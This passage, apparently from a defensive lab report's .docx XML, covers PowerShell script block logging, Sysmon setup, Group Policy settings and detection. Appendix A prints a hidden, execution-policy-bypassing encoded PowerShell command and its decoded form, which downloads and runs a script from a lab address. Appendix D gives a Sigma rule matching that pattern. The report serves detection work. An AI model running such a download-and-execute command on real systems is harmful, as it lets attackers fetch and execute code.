          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] Microsoft, "Windows Event Forwarding," Windows IT Pro Documentation, Microsoft Learn. [Online]. Available: https://learn.microsoft.com/windows/security/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix A — Full Test Command and Decoded Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoded command as executed:</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powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMAAuADIALgAxADUALwBwAGEAeQBsAG8AYQBkAC4AcABzADEAJwApAA==</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Decoded payload (as recovered from Event ID 4104):</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IEX (New-Object Net.WebClient).DownloadString('http://10.0.2.15/payload.ps1')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix B — Sysmon Installation Commands</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Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "C:\Sysmon.zip"
Expand-Archive C:\Sysmon.zip -DestinationPath C:\Sysmon -Force
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml" -OutFile "C:\Sysmon\sysmonconfig-export.xml"
cd C:\Sysmon
.\Sysmon64.exe -accepteula -i sysmonconfig-export.xml
.\Sysmon64.exe -c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix D — Illustrative Sigma Rule for Automated Correlation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">The following pseudo-Sigma rule illustrates how the manual correlation performed in Section 5.3 could be automated in a SIEM, matching Event ID 4104 script block content against the indicators identified in this report:</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title: Suspicious Encoded PowerShell Download-and-Execute
id: 8f2c7b10-example-rule-not-registered
status: experimental
logsource:
  product: windows
  service: powershell
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains:
      - 'DownloadString'
      - 'Net.WebClient'
      - 'IEX'
  condition: selection
level: high</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix C — Group Policy Settings Summary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60"/>
      </w:tblGrid>
      <w:tr>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Policy Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Setting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="206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Windows Components → Windows PowerShell</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Turn on PowerShell Script Block Logging</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Enabled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Windows Components → Windows PowerShell</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Turn on Module Logging</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Enabled (*)</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Windows Components → Windows PowerShell</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Turn on PowerShell Transcription</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Enabled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Advanced Audit Policy → Detailed Tracking</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Audit Process Creation</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Success</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 → Audit Process Creation</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Include command line in process creation events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="2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3429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905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19384e2cd02339de36a1bd1386500a7ad5aaf9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cc2e42dc7d9f14f6333a3cf51340f9c06de8729d.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/694c06a2fbd07863e371c9bd6143ccf8d1cdb513.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d64dd1106c992ede79bb7e1b10fe24f531604e59.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/94e90275595db2caeeffec71fdd7bcdbadda6ee0.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0389e9d3b482064d8c4a9a07d73cbed8633c97ae.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/000a009085dfab509068fc482b9519cb59400a2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419384e2cd02339de36a1bd1386500a7ad5aaf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2026-08-02T15:54:44.512Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-02T15:54:44.513Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>